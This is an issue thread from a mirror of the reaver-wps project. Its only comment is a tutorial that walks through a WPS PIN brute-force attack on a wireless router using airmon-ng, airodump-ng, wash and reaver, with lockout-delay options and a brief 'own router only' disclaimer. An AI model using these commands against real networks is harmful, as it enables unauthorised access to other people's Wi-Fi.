bubu23 / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

Reaver #552

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago
First off.. this tutorial is for educational purposes only. do not attempt this 
on any other router but your own. attacking a neighbors router is ILLEGAL! 

This tutorial assumes you already have kali linux or backtrack5. Also assuming 
your wireless device supports monitoring mode.

Lets begin.

root@bt:~# airmon-ng check
####   dhclient#
####   dhclient#
root@bt:~# kill ####
root@bt:~# kill ####
root@bt:~# ifconfig

wlan
wlan0
wlan1

mine is wlan0

root@bt:~# airmon-ng start wlan0

This will put that device into monitor mode. (usually mon0)

root@bt:~# airodump-ng mon0
 this will bring up the bssid of your victim (yourself)(press ctrl+c to stop the scan once yoir bssid is found)

root@bt:~# wash -i mon0
This will display if the wps is locked or not.

If you get the error code bad fcs thats ok. just hit ctrl+c to stop it.

root@bt:~# wash -i mon0 --ignore-fcs
 this should take care of that pesky bad fcs problem..

Find your bssid and write it down. note if it says wps locked no or yes.
If now.. we move on.

root@bt:~# reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -d 1 --lock-delay=315 

Press enter and let reaver work its magic. 

hope this helps

Original issue reported on code.google.com by dj.kil...@gmail.com on 1 Sep 2013 at 6:15